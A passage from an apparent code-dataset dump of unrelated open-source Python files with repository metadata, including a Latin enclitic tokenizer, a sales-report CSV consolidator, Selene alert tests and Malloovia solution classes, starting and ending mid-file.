"""An error where a list has not been established"""
def __str__(self):
return 'You must specify a list to use'
class InvalidListError(TodoooError):
"""An error where a list does not exist"""
def __str__(self):
return 'The list you specified does not exist'
class SameItemError(TodoooError):
"""An error to signify that the same item was selected"""
def __str__(self):
return 'The items you selected are the same'
class InvalidArgumentError(TodoooError):
"""An error where the argument type is not what was expected"""
def __str__(self):
return 'You entered an invalid argument'
class ExpectedItemError(InvalidArgumentError):
"""An error where a numeric Item ID was expected"""
def __str__(self):
return 'Please enter a item ID'
class InvalidItemError(InvalidArgumentError):
"""An error where the Item ID is out of range"""
def __str__(self):
return 'Please enter a item ID from this list'
|
dansackett/Todooo
|
todooo/errors.py
|
Python
|
mit
| 1,302
|
# coding: utf-8
__author__ = 'Rafael Borges'
'''
Ex. de teste do uso e leitura de grafos
'''
grafo = {
'1': ['2', '5'],
'2': ['1', '3', '5'],
'3': ['2', '4'],
'4': ['3', '5', '6'],
'5': ['1', '2', '4'],
'6': ['4']
}
def encontra_caminho(grafo, inicio, fim, caminho=None):
if caminho is None:
caminho = []
caminho += [inicio]
if inicio == fim:
return caminho
if not inicio in grafo:
return None
for aresta in grafo[inicio]:
if aresta not in caminho:
novo_caminho = encontra_caminho(grafo, aresta, fim, caminho)
if novo_caminho:
return novo_caminho
return None
if __name__ == '__main__':
print(grafo)
caminho = encontra_caminho(grafo, '1', '6')
print(caminho)
caminho = encontra_caminho(grafo, '6', '1')
print(caminho)
caminho = encontra_caminho(grafo, '5', '3')
print(caminho)
|
Razborges/algGrafos
|
Trabalho2/teste_grafo.py
|
Python
|
mit
| 916
|
# Python script to organize PixelPOS "Profit by Summary Group" sales reports
# tidied up by saleswiz.py into single tables for chart production.
import os
import csv
import sys
from glob import glob
from collections import OrderedDict
from copy import deepcopy
# *sales_clean.csv columns.
cols = ['Category', 'Subcategory', 'Item', 'Quantity', 'Value',]
def flip(out_base, files):
"""Consolidate monthly or weekly sales_clean.csv files into single table."""
dl = []
q = OrderedDict([(c, []) for c in cols[:3]])
for i, f in enumerate(files):
dl.append(OrderedDict())
for c in cols:
dl[i][c] = []
try:
with open(f, 'rb') as in_f:
in_d = csv.DictReader(in_f, fieldnames=cols, delimiter=',', quotechar='"')
for row in in_d:
[dl[i][c].append(row[c].strip()) for c in cols]
in_f.close()
except:
print 'Problem reading file "%s".' % f.split('/')[-1]
return False
period = f.split('/')[-1].split('sales')[0]
q[period] = []
for r in xrange(1, len(dl[0][cols[0]])):
[q[c].append(dl[0][c][r]) for c in cols[:3]]
v = deepcopy(q)
for i, d in enumerate(dl):
for r in xrange(1, len(dl[0][cols[0]])):
if d['Quantity'][r]:
q[q.keys()[i+3]].append(d['Quantity'][r])
v[v.keys()[i+3]].append(d['Value'][r])
else:
q[q.keys()[i+3]].append('')
v[v.keys()[i+3]].append('')
ok_q = write_file(q, out_base + 'quantity.csv', q.keys())
ok_v = write_file(v, out_base + 'value.csv', v.keys())
return ok_q and ok_v
def write_file(d, out_file, columns):
"""Write output csv file."""
try:
with open(out_file, 'wb') as out_f:
out_d = csv.DictWriter(out_f, fieldnames=OrderedDict([(c, None) for c in columns]))
out_d.writeheader()
for r in xrange(len(d[columns[0]])):
out_d.writerow(OrderedDict([(c, d[c][r]) for c in columns]))
out_f.close()
return True
except:
print 'Problem writing file "%s".' % out_file.split('/')[-1]
return False
def main():
try:
freq = sys.argv[1]
except:
freq = ''
freq = freq.strip()[0].lower() if freq else ''
if freq not in ['m', 'w', 'b',]:
print 'Specify monthly, weekly or both.'
return
reports_dir_win = 'C:\\Users\\Malky\\Documents\\BD\\Reports\\sales'
reports_dir_py = reports_dir_win.decode('utf-8').replace('\\','/')
monthly = reports_dir_py + '/monthly_'
weekly = reports_dir_py + '/weekly_'
clean_files = glob(reports_dir_py + '/' + '*sales_clean.csv')
m_files = [f.decode('utf-8').replace('\\','/') for f in clean_files if 'we' not in f]
w_files = [f.decode('utf-8').replace('\\','/') for f in clean_files if 'we' in f]
if freq == 'm':
ok_m = flip(monthly, m_files)
print 'Monthly File OK.' if ok_m else 'Monthly File No Bueno.'
elif freq == 'w':
ok_w = flip(weekly, w_files)
print 'Weekly File OK.' if ok_w else 'Weekly File No Bueno.'
else:
ok_m = flip(monthly, m_files)
print 'Monthly File OK.' if ok_m else 'Monthly File No Bueno.'
ok_w = flip(weekly, w_files)
print 'Weekly File OK.' if ok_w else 'Weekly File No Bueno.'
if __name__ == '__main__':
main()
|
malwatt/saleswiz
|
flipwiz.py
|
Python
|
mit
| 3,460
|
from post import views as post_views
from utils.helpers import search_keyword, \
get_id_from_response, \
get_suggested_id_from_response, get_search_object
def search(request):
domain = request.GET.get('domain')
if domain == 'post':
return search_in_post(request)
elif domain == 'category':
return search_in_category(request)
def search_in_post(request):
keyword = request.GET.get("keyword")
response = search_keyword(keyword)
id_list = get_id_from_response(response)
suggested_id_list = get_suggested_id_from_response(response.suggest.post_suggester)
for suggested_id in suggested_id_list:
for s_id in suggested_id:
id_list.append(s_id)
return post_views.get_search_results(request, id_list)
def search_in_category(request):
keyword = request.GET.get("keyword")
es_client = get_search_object()
result_set = es_client.query("match", categories=keyword)
response = result_set.execute()
id_list = get_id_from_response(response)
return post_views.get_search_results(request, id_list)
|
Prakash2403/Blog
|
search/views.py
|
Python
|
mit
| 1,090
|
# MIT License
#
# Copyright (c) 2015-2021 Iakiv Kramarenko
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from selenium.common.exceptions import NoAlertPresentException
from tests.integration.helpers.givenpage import GivenPage
def test_can_accept_alert(session_browser):
GivenPage(session_browser.driver).opened_with_body(
"""
<p>
<input id="alert_btn" type="button" onclick="alert('Good morning')" value="Run">
</p>"""
)
session_browser.element("#alert_btn").click()
session_browser.switch_to.alert.accept()
try:
session_browser.switch_to.alert.accept()
assert False, 'actual: alert presents, expected: alert not present'
except NoAlertPresentException:
assert True
def test_can_dismiss_confirm_dialog(session_browser):
GivenPage(session_browser.driver).opened_with_body(
"""
<p>
<input id="alert_btn" type="button" onclick="alert('Good morning')" value="Run">
</p>"""
)
session_browser.element("#alert_btn").click()
session_browser.switch_to.alert.dismiss()
try:
session_browser.switch_to.alert.accept()
assert False, 'actual: alert presents, expected: alert not present'
except NoAlertPresentException:
assert True
def test_alert_is_present(session_browser):
GivenPage(session_browser.driver).opened_with_body(
"""
<p>
<input id="alert_btn" type="button" onclick="alert('Good morning')" value="Run">
</p>"""
)
session_browser.element("#alert_btn").click()
try:
session_browser.switch_to.alert.accept()
assert True
except NoAlertPresentException:
assert False, 'actual: alert not present, expected: alert is present'
|
yashaka/selene
|
tests/integration/browser__switch_to__alert_test.py
|
Python
|
mit
| 2,778
|
""" Constants file """
API_URL = 'https://graph.facebook.com/v2.9/me/messages'
NEWS_URL = 'https://newsapi.org/v1/'
|
MichaelYusko/Bot-Chucky
|
bot_chucky/constants.py
|
Python
|
mit
| 117
|
"""Language-specific word tokenizers. Primary purpose is to handle enclitics.
Re: latin
Starter lists have been included to handle the Latin enclitics
(-que, -ne, -ue/-ve, -cum). These lists are based on high-frequency vocabulary
and have been supplemented on a as-needed basis; i.e. they are not
comprehensive. Additions to the exceptions list are welcome. PJB
"""
from nltk.tokenize.punkt import PunktLanguageVars
__author__ = ['Patrick J. Burns <patrick@diyclassics.org>',
'Kyle P. Johnson <kyle@kyle-p-johnson.com>']
__license__ = 'MIT License. See LICENSE.'
class WordTokenizer: # pylint: disable=too-few-public-methods
"""Tokenize according to rules specific to a given language."""
def __init__(self, language):
"""Take language as argument to the class. Check availability and
setup class variables."""
self.language = language
self.available_languages = ['latin']
assert self.language in self.available_languages, \
"Specific tokenizer not available for '{0}'. Only available for: '{1}'.".format(self.language, # pylint: disable=line-too-long
self.available_languages) # pylint: disable=line-too-long
if self.language == 'latin':
self.enclitics = ['que', 'n', 'ne', 'ue', 've', 'cum','st']
self.inclusions = []
cum_inclusions = ['mecum', 'tecum', 'secum', 'nobiscum', 'vobiscum', 'quocum', 'quicum' 'quibuscum']
self.exceptions = self.enclitics
que_exceptions = []
n_exceptions = []
ne_exceptions = []
ue_exceptions = []
ve_exceptions = []
cum_exceptions = []
st_exceptions = []
# quisque
que_exceptions += ['quisque', 'quidque', 'quicque', 'quodque', 'cuiusque', 'cuique',
'quemque', 'quoque', 'quique', 'quaeque', 'quorumque', 'quarumque',
'quibusque', 'quosque', 'quasque']
# uterque
que_exceptions += ['uterque', 'utraque', 'utrumque', 'utriusque', 'utrique', 'utrumque',
'utramque', 'utroque', 'utraque', 'utrique', 'utraeque', 'utrorumque',
'utrarumque', 'utrisque', 'utrosque', 'utrasque']
# quiscumque
que_exceptions += ['quicumque', 'quidcumque', 'quodcumque', 'cuiuscumque', 'cuicumque',
'quemcumque', 'quamcumque', 'quocumque', 'quacumque', 'quicumque',
'quaecumque', 'quorumcumque', 'quarumcumque', 'quibuscumque',
'quoscumque', 'quascumque']
# unuscumque
que_exceptions += ['unusquisque', 'unaquaeque', 'unumquodque', 'unumquidque',
'uniuscuiusque', 'unicuique', 'unumquemque', 'unamquamque', 'unoquoque',
'unaquaque']
# plerusque
que_exceptions += ['plerusque', 'pleraque', 'plerumque', 'plerique', 'pleraeque',
'pleroque', 'pleramque', 'plerorumque', 'plerarumque', 'plerisque',
'plerosque', 'plerasque']
# misc
que_exceptions += ['absque', 'abusque', 'adaeque', 'adusque', 'aeque', 'antique', 'atque',
'circumundique', 'conseque', 'cumque', 'cunque', 'denique', 'deque',
'donique', 'hucusque', 'inique', 'inseque', 'itaque', 'longinque',
'namque', 'oblique', 'peraeque', 'praecoque', 'propinque',
'qualiscumque', 'quandocumque', 'quandoque', 'quantuluscumque',
'quantumcumque', 'quantuscumque', 'quinque', 'quocumque',
'quomodocumque', 'quomque', 'quotacumque', 'quotcumque',
'quotienscumque', 'quotiensque', 'quotusquisque', 'quousque', 'relinque',
'simulatque', 'torque', 'ubicumque', 'ubique', 'undecumque', 'undique',
'usque', 'usquequaque', 'utcumque', 'utercumque', 'utique', 'utrimque',
'utrique', 'utriusque', 'utrobique', 'utrubique']
ne_exceptions += ['absone', 'acharne', 'acrisione', 'acumine', 'adhucine', 'adsuetudine',
'aeetine', 'aeschynomene', 'aesone', 'agamemnone', 'agmine', 'albane',
'alcyone', 'almone', 'alsine', 'amasene', 'ambitione', 'amne', 'amoene',
'amymone', 'anadyomene', 'andrachne', 'anemone', 'aniene', 'anne',
'antigone', 'aparine', 'apolline', 'aquilone', 'arachne', 'arne',
'arundine', 'ascanione', 'asiane', 'asine', 'aspargine', 'babylone',
'barine', 'bellone', 'belone', 'bene', 'benigne', 'bipenne', 'bizone',
'bone', 'bubone', 'bulbine', 'cacumine', 'caligine', 'calymne', 'cane',
'carcine', 'cardine', 'carmine', 'catacecaumene', 'catone', 'cerne',
'certamine', 'chalbane', 'chamaedaphne', 'chamaemyrsine', 'chaone',
'chione', 'christiane', 'clymene', 'cognomine', 'commagene', 'commune',
'compone', 'concinne', 'condicione', 'condigne', 'cone', 'confine',
'consone', 'corone', 'crastine', 'crepidine', 'crimine', 'crine',
'culmine', 'cupidine', 'cyane', 'cydne', 'cyllene', 'cyrene', 'daphne',
'depone', 'desine', 'dicione', 'digne', 'dine', 'dione', 'discrimine',
'diutine', 'dracone', 'dulcedine', 'elatine', 'elephantine', 'elleborine',
'epidamne', 'erigone', 'euadne', 'euphrone', 'euphrosyne', 'examine',
'faune', 'femine', 'feminine', 'ferrugine', 'fine', 'flamine', 'flumine',
'formidine', 'fragmine', 'fraterne', 'fulmine', 'fune', 'germane',
'germine', 'geryone', 'gorgone', 'gramine', 'grandine', 'haecine',
'halcyone', 'hammone', 'harundine', 'hedone', 'helene', 'helxine',
'hermione', 'heroine', 'hesione', 'hicine', 'hicne', 'hierabotane',
'hippocrene', 'hispane', 'hodierne', 'homine', 'hominesne', 'hortamine',
'hucine', 'humane', 'hunccine', 'huncine', 'iasione', 'iasone', 'igne',
'imagine', 'immane', 'immune', 'impoene', 'impone', 'importune', 'impune',
'inane', 'inconcinne', 'indagine', 'indigne', 'inferne', 'inguine',
'inhumane', 'inpone', 'inpune', 'insane', 'insigne', 'inurbane', 'ismene',
'istucine', 'itone', 'iuuene', 'karthagine', 'labiene', 'lacedaemone',
'lanugine', 'latine', 'legione', 'lene', 'lenone', 'libidine', 'limine',
'limone', 'lumine', 'magne', 'maligne', 'mane', 'margine', 'marone',
'masculine', 'matutine', 'medicamine', 'melpomene', 'memnone', 'mesene',
'messene', 'misene', 'mitylene', 'mnemosyne', 'moderamine', 'moene',
'mone', 'mortaline', 'mucrone', 'munimine', 'myrmidone', 'mytilene',
'necne', 'neptune', 'nequene', 'nerine', 'nocturne', 'nomine', 'nonne',
'nullane', 'numine', 'nuncine', 'nyctimene', 'obscene', 'obsidione',
'oenone', 'omine', 'omne', 'oppone', 'opportune', 'ordine', 'origine',
'orphne', 'oxymyrsine', 'paene', 'pallene', 'pane', 'paraetacene',
'patalene', 'pectine', 'pelagine', 'pellene', 'pene', 'perbene',
'perbenigne', 'peremne', 'perenne', 'perindigne', 'peropportune',
'persephone', 'phryne', 'pirene', 'pitane', 'plane', 'pleione', 'plene',
'pone', 'praefiscine', 'prasiane', 'priene', 'priuigne', 'procne',
'proditione', 'progne', 'prone', 'propone', 'pulmone', 'pylene', 'pyrene',
'pythone', 'ratione', 'regione', 'religione', 'remane', 'retine', 'rhene',
'rhododaphne', 'robigine', 'romane', 'roxane', 'rubigine', 'sabine',
'sane', 'sanguine', 'saturne', 'seditione', 'segne', 'selene', 'semine',
'semiplene', 'sene', 'sepone', 'serene', 'sermone', 'serrane', 'siccine',
'sicine', 'sine', 'sithone', 'solane', 'sollemne', 'somne', 'sophene',
'sperne', 'spiramine', 'stamine', 'statione', 'stephane', 'sterne',
'stramine', 'subpone', 'subtegmine', 'subtemine', 'sulmone', 'superne',
'supine', 'suppone', 'susiane', 'syene', 'tantane', 'tantine', 'taprobane',
'tegmine', 'telamone', 'temne', 'temone', 'tene', 'testudine', 'theophane',
'therone', 'thyone', 'tiberine', 'tibicine', 'tiburne', 'tirone',
'tisiphone', 'torone', 'transitione', 'troiane', 'turbine', 'turne',
'tyrrhene', 'uane', 'uelamine', 'uertigine', 'uesane', 'uimine', 'uirgine',
'umbone', 'unguine', 'uolumine', 'uoragine', 'urbane', 'uulcane', 'zone']
n_exceptions += ['aenean', 'agmen', 'alioquin', 'an', 'attamen', 'carmen', 'certamen', 'cognomen', 'crimen', 'dein', 'discrimen', 'en', 'epitheton', 'exin', 'flumen', 'forsan', 'forsitan', 'fulmen', 'iason', 'in', 'limen', 'liquamen', 'lumen', 'nomen', 'non', 'numen', 'omen', 'orion', 'quin', 'semen', 'specimen', 'tamen', 'titan']
ue_exceptions += ['agaue', 'ambigue', 'assidue', 'aue', 'boue', 'breue', 'calue', 'caue',
'ciue', 'congrue', 'contigue', 'continue', 'curue', 'exigue', 'exue',
'fatue', 'faue', 'fue', 'furtiue', 'gradiue', 'graue', 'ignaue',
'incongrue', 'ingenue', 'innocue', 'ioue', 'lasciue', 'leue', 'moue',
'mutue', 'naue', 'neue', 'niue', 'perexigue', 'perspicue', 'pingue',
'praecipue', 'praegraue', 'prospicue', 'proterue', 'remoue', 'resolue',
'saeue', 'salue', 'siue', 'solue', 'strenue', 'sue', 'summoue',
'superflue', 'supplicue', 'tenue', 'uiue', 'ungue', 'uoue']
ve_exceptions += ['agave', 'ave', 'bove', 'breve', 'calve', 'cave', 'cive', 'curve', 'fave',
'furtive', 'gradive', 'grave', 'ignave', 'iove', 'lascive', 'leve', 'move',
'nave', 'neve', 'nive', 'praegrave', 'prospicve', 'proterve', 'remove',
'resolve', 'saeve', 'salve', 'sive', 'solve', 'summove', 'vive', 'vove']
st_exceptions += ['abest', 'adest', 'ast', 'deest', 'est', 'inest', 'interest', 'post', 'potest', 'prodest', 'subest', 'superest']
self.exceptions = list(set(self.exceptions
+ que_exceptions
+ ne_exceptions
+ n_exceptions
+ ue_exceptions
+ ve_exceptions
+ st_exceptions
))
self.inclusions = list(set(self.inclusions
+ cum_inclusions))
def tokenize(self, string):
"""Tokenize incoming string."""
punkt = PunktLanguageVars()
generic_tokens = punkt.word_tokenize(string)
# Rewrite as an if-else block for exceptions rather than separate list comprehensions
generic_tokens = [x for item in generic_tokens for x in ([item] if item.lower() != 'nec' else ['c', item[:-1]])] # Handle 'nec' as a special case.
generic_tokens = [x for item in generic_tokens for x in ([item] if item.lower() != 'sodes' else [item[0]+'i', 'audes'])] # Handle 'sodes' as a special case.
generic_tokens = [x for item in generic_tokens for x in ([item] if item.lower() != 'sultis' else [item[0]+'i', 'vultis'])] # Handle 'sultis' as a special case.
generic_tokens = [x for item in generic_tokens for x in ([item] if item.lower() != 'satin' else [item[:-1] + 's', 'ne'])] # Handle 'satin' as a special case.
generic_tokens = [x for item in generic_tokens for x in ([item] if item.lower() != 'scin' else [item[:-1] + 's', 'ne'])] # Handle 'scin' as a special case.
specific_tokens = []
for generic_token in generic_tokens:
is_enclitic = False
if generic_token not in self.exceptions:
for enclitic in self.enclitics:
if generic_token.endswith(enclitic):
if enclitic == 'cum':
if generic_token.lower() in self.inclusions:
specific_tokens += [enclitic] + [generic_token[:-len(enclitic)]]
else:
specific_tokens += [generic_token]
elif enclitic == 'n':
specific_tokens += [generic_token[:-len(enclitic)]] + ['ne']
elif enclitic == 'st':
if generic_token.endswith('ust'):
specific_tokens += [generic_token[:-len(enclitic)+1]] + ['est']
else:
# Does not handle 'similist', 'qualist', etc. correctly
specific_tokens += [generic_token[:-len(enclitic)]] + ['est']
else:
specific_tokens += [enclitic] + [generic_token[:-len(enclitic)]]
is_enclitic = True
break
if not is_enclitic:
specific_tokens.append(generic_token)
return specific_tokens
def nltk_tokenize_words(string, attached_period=False):
"""Wrap NLTK's tokenizer PunktLanguageVars(), but make final period
its own token.
>>> nltk_punkt("Sentence 1. Sentence 2.")
>>> ['Sentence', 'one', '.', 'Sentence', 'two', '.']
Optionally keep the NLTK's output:
>>> nltk_punkt("Sentence 1. Sentence 2.", attached_period=True)
>>> ['Sentence', 'one.', 'Sentence', 'two.']
TODO: Run some tests to determine whether there is a large penalty for
re-calling PunktLanguageVars() for each use of this function. If so, this
will need to become a class, perhaps inheriting from the PunktLanguageVars
object. Maybe integrate with WordTokenizer.
"""
assert isinstance(string, str), "Incoming string must be type str."
punkt = PunktLanguageVars()
tokens = punkt.word_tokenize(string)
if attached_period:
return tokens
new_tokens = []
for word in tokens:
if word.endswith('.'):
new_tokens.append(word[:-1])
new_tokens.append('.')
else:
new_tokens.append(word)
return new_tokens
|
coderbhupendra/cltk
|
cltk/tokenize/word.py
|
Python
|
mit
| 15,959
|
# coding: utf-8
"""Classes for storing and reporting solutions of malloovia problems."""
from typing import Union, NamedTuple, Optional, List, Sequence, Tuple
from enum import IntEnum
from functools import singledispatch
import pulp # type: ignore
from .model import (
remove_namedtuple_defaultdoc,
PerformanceValues,
InstanceClass,
App,
Problem,
)
class Status(IntEnum):
"Possible status of malloovia's solution"
unsolved = 0
optimal = 1
infeasible = 2
integer_infeasible = 3
overfull = 4
trivial = 5
aborted = 6
cbc_error = 7
unknown = 8
def pulp_to_malloovia_status(status: int) -> Status:
"""Receives a PuLP status code and returns a Malloovia :class:`Status`."""
if status == pulp.LpStatusInfeasible:
r = Status.infeasible
elif status == pulp.LpStatusNotSolved:
r = Status.aborted
elif status == pulp.LpStatusOptimal:
r = Status.optimal
elif status == pulp.LpStatusUndefined:
r = Status.integer_infeasible
else:
r = Status.unknown
return r
class MallooviaHistogram(dict):
"""This class stores a multi-dimensional histogram, providing the same
interface than a standard dict whose keys are workload tuples and the
values are the count of the number of times that the tuple is observed
in the computed period."""
apps: Tuple[App, ...] = None
"""The apps attribute stores a tuple with references to the apps involved
in the workload. The order of this tuple must match the order of workloads for
of each tuple which acts as key in the histogram"""
def __missing__(self, key):
# Default value for missing keys is zero
return 0
def __repr__(self):
return "MallooviaHistogram with %d values" % len(self)
@remove_namedtuple_defaultdoc
class MallooviaStats(NamedTuple):
"""Stores data related to the Malloovia solver."""
gcd: bool
"bool: whether GCD technique was used or not."
status: Status
":class:`.Status`: status of the solution."
gcd_multiplier: float = 1.0
"""float: the multiplier used in GCD technique (defaults to 1.0)."""
frac_gap: Optional[float] = None
"""float: the fracGap passed to cbc solver (defaults to None)."""
max_seconds: Optional[float] = None
"""float: the maxSeconds passed to cbc solver (defaults to None)."""
lower_bound: Optional[float] = None
"""float: the lower bound of the solution as reported by cbc when the
optimal solution is not available (defaults to None)."""
@remove_namedtuple_defaultdoc
class SolvingStats(NamedTuple):
"""Stores the statistics that can be gathered from a solution
of Phase I, or one single timeslot in Phase II."""
algorithm: MallooviaStats
""":class:`.MallooviaStats`: additional info related to the particular
algorithm used to solve the problem."""
creation_time: float
"""float: time required to create the LP problem."""
solving_time: float
"""float: time required to solve the LP problem."""
optimal_cost: float
"""float: optimal cost as reported by the LP solver, or None if no solution
was found."""
@remove_namedtuple_defaultdoc
class GlobalSolvingStats(NamedTuple):
"""Stores the global statistics for Phase II, which are a sum of the
statistics of each timeslot."""
creation_time: float
"""float: sum of the time required to create the LP problem
for each timeslot."""
solving_time: float
"""float: sum of the time required to solve the LP problem
for each timeslot."""
optimal_cost: float
"""float: sum of the optimal costs as reported by the LP problem
for each timeslot."""
status: Status
""":class:`.Status`: global status computed from the status of
each timeslot."""
default_algorithm: Optional[str] = None
"""Currently unused"""
@remove_namedtuple_defaultdoc
class ReservedAllocation(NamedTuple):
"""Stores the number of reserved instances to allocate during the whole reservation
period."""
instance_classes: Tuple[InstanceClass, ...]
"""List[:class:`.InstanceClass`, ...]: list of reserved instance classes
in the allocation."""
vms_number: Tuple[float, ...]
"""List[float, ...]: list of numbers, representing the number of instance classes
to be reserved of each type. The corresponding instance class is obtained
from the ``instance_classes`` attribute using the same index."""
@remove_namedtuple_defaultdoc
class AllocationInfo(NamedTuple):
"""Stores the allocation for a series of timeslots. It can be a single
timeslot, or the sequence of allocations for the whole reservation period."""
values: Tuple[Tuple[Tuple[float, ...], ...], ...]
"""Tuple[Tuple[Tuple[float, ...], ...], ...]: contains a list with one element
per timeslot. Each element in this sequence is a list (with one element
per app), which is in turn a list (with one element per instance class).
These values are numbers which can represent the number of instance
classes of that type to be allocated for that app during that timeslot,
or the cost associated with these instance classes, or the performance
given by these instance classes, depending on the ``units`` field.
So, for example, if ``units`` is ``"vms"``, then ``values[2][1][3]``
represents the number of VMs of the instance class 3 to be allocated
for application 1 during the timseslot 2.
Note that, if the allocation contains a single timeslot, it is still
necessary to specify the index (0) in the first dimension,
e.g. ``vms_number[0][1][3]``.
To match the indexes in those arrays to actual instance classes and
apps, the attributes ``instance_classes`` and ``apps`` should be used.
So, for the above example, the application would be ``apps[1]`` and
the instance class would be ``instance_classes[3]``. If required,
the workload for that particular timeslot (2) can also be retrieved from
``workload_tuples[2]``."""
units: str
"""str: a string identifying the kind of information stored in the ``values``
field. It can be ``"vms"`` (number of VM instances), ``"cost"`` or any
currency (cost of these instances) or ``"rph"`` (performance of these
instances)."""
apps: Sequence[App]
"""Sequence[:class:`.App`]: is a list of apps to give meaning to the second
index in ``values``."""
instance_classes: Sequence[InstanceClass]
"""Sequence[:class:`.InstanceClass`]: is a list of instance classes to give
meaning to the third index in ``values``."""
workload_tuples: Sequence[Tuple[float, ...]]
"""Sequence[Tuple[float, ...]]: is a list of workload tuples to give meaning to the
first index in ``values``. Each element is a tuple with as many values
as apps, being each one the workload for each app."""
repeats: List[int] = []
"""List[int]: number of repetitions of each workload_tuple, for the case
in which the allocation is per load-level (histogram). It can be an empty
list (default value) for the case in which the allocation is per time-slot."""
def __repr__(self):
d0 = len(self.values)
if self.values:
d1 = len(self.values[0])
else:
d1 = 0
if d1:
d2 = len(self.values[0][0])
else:
d2 = 0
return "<{} {}x{}x{}>".format(self.__class__.__name__, d0, d1, d2)
@remove_namedtuple_defaultdoc
class SolutionI(NamedTuple):
"""Stores a solution for phase I."""
id: str
"str: arbitrary id for this object."
problem: Problem
""":class:`.Problem`: reference to the problem which originated
this solution."""
solving_stats: SolvingStats
""":class:`.SolvingStats`: statistics about this solution."""
allocation: AllocationInfo
""":class:`.AllocationInfo`: allocation provided in this solution."""
reserved_allocation: ReservedAllocation
""":class:`.ReservedAllocation`: allocation for reserved instances only."""
@remove_namedtuple_defaultdoc
class SolutionII(NamedTuple):
"""Stores a solution for phase II."""
id: str
"str: arbitrary id for this object."
problem: Problem
""":class:`.Problem`: reference to the problem which originated
this solution."""
solving_stats: Sequence[SolvingStats]
""":Sequence[class:`.SolvingStats`]: list of the SolvingStats for
each timeslot."""
global_solving_stats: GlobalSolvingStats
""":class:`.GlobalSolvingStats`: summary of the solving stats."""
previous_phase: SolutionI
""":class:`.SolutionI`: reference to the solution of the previous phase."""
allocation: AllocationInfo
""":class:`.AllocationInfo`: allocation for the whole period, built from the
allocations of the individual timeslots."""
@singledispatch
def compute_allocation_cost(alloc: AllocationInfo) -> AllocationInfo:
"""Computes the cost of each element of the allocation.
Args:
alloc: the allocation whose cost has to be computed
Returns:
Another allocation in which the ``values`` field contains
the cost of that element (it is the original ``values``
multiplied by the cost of the corresponding instance class)
"""
costs = []
for row in alloc.values:
costs_row = []
for app_alloc in row:
costs_app = []
for i, _ in enumerate(app_alloc):
costs_app.append(app_alloc[i] * alloc.instance_classes[i].price)
costs_row.append(tuple(costs_app))
costs.append(tuple(costs_row))
return alloc._replace(values=tuple(costs), units="cost")
@compute_allocation_cost.register(SolutionI)
@compute_allocation_cost.register(SolutionII)
def _(solution: Union[SolutionI, SolutionII]) -> AllocationInfo:
return compute_allocation_cost(solution.allocation)
@singledispatch
def compute_allocation_performance(
alloc: AllocationInfo, performances: PerformanceValues
) -> AllocationInfo:
"""Computes the performance of each element of the allocation.
Args:
alloc: the allocation whose performance has to be computed
performances: the set of performances for each pair of instance class
and application
Returns:
Another allocation in which the ``values`` field contains
the performance of that element (it is the original ``values``
multiplied by the performance of the corresponding instance class
for the corresponding app)
"""
perfs = []
for row in alloc.values:
perfs_row = []
for j, app_alloc in enumerate(row):
app = alloc.apps[j]
perfs_app = []
for i, _ in enumerate(app_alloc):
iclass = alloc.instance_classes[i]
perfs_app.append(app_alloc[i] * performances[iclass, app])
perfs_row.append(tuple(perfs_app))
perfs.append(tuple(perfs_row))
return alloc._replace(values=tuple(perfs), units="rph")
@compute_allocation_performance.register(SolutionI)
@compute_allocation_performance.register(SolutionII)
def __(
solution: Union[SolutionI, SolutionII]
) -> AllocationInfo: # pylint:disable=function-redefined
return compute_allocation_performance(
solution.allocation, solution.problem.performances.values
)
__all__ = [
"Status",
"MallooviaStats",
"SolvingStats",
"GlobalSolvingStats",
"AllocationInfo",
"ReservedAllocation",
"SolutionI",
"SolutionII",
"compute_allocation_cost",
"compute_allocation_performance",
]
|
asi-uniovi/malloovia
|
malloovia/solution_model.py
|
Python
|
mit
| 11,913
|
import datetime
import os
import re
import pdb
import numpy as np
import pandas as pd
from wfdb.io import download
from wfdb.io import _signal
"""
Notes
-----
In the original WFDB package, certain fields have default values, but
not all of them. Some attributes need to be present for core
functionality, i.e. baseline, whereas others are not essential, yet have
defaults, i.e. base_time.
This inconsistency has likely resulted in the generation of incorrect
files, and general confusion. This library aims to make explicit,
whether certain fields are present in the file, by setting their values
to None if they are not written in, unless the fields are essential, in
which case an actual default value will be set.
The read vs write default values are different for 2 reasons:
1. We want to force the user to be explicit with certain important
fields when writing WFDB records fields, without affecting
existing WFDB headers when reading.
2. Certain unimportant fields may be dependencies of other
important fields. When writing, we want to fill in defaults
so that the user doesn't need to. But when reading, it should
be clear that the fields are missing.
If all of the fields were filled out in a WFDB header file, they would appear
in this order with these seperators:
RECORD_NAME/NUM_SEG NUM_SIG SAMP_FREQ/COUNT_FREQ(BASE_COUNT_VAL) SAMPS_PER_SIG BASE_TIME BASE_DATE
FILE_NAME FORMATxSAMP_PER_FRAME:SKEW+BYTE_OFFSET ADC_GAIN(BASELINE)/UNITS ADC_RES ADC_ZERO CHECKSUM BLOCK_SIZE DESCRIPTION
"""
int_types = (int, np.int64, np.int32, np.int16, np.int8)
float_types = (float, np.float64, np.float32) + int_types
_SPECIFICATION_COLUMNS = ['allowed_types', 'delimiter', 'dependency',
'write_required', 'read_default', 'write_default']
RECORD_SPECS = pd.DataFrame(
index=['record_name', 'n_seg', 'n_sig', 'fs', 'counter_freq',
'base_counter', 'sig_len', 'base_time', 'base_date'],
columns=_SPECIFICATION_COLUMNS,
dtype='object',
data=[[(str,), '', None, True, None, None], # record_name
[int_types, '/', 'record_name', True, None, None], # n_seg
[int_types, ' ', 'record_name', True, None, None], # n_sig
[float_types, ' ', 'n_sig', True, 250, None], # fs
[float_types, '/', 'fs', False, None, None], # counter_freq
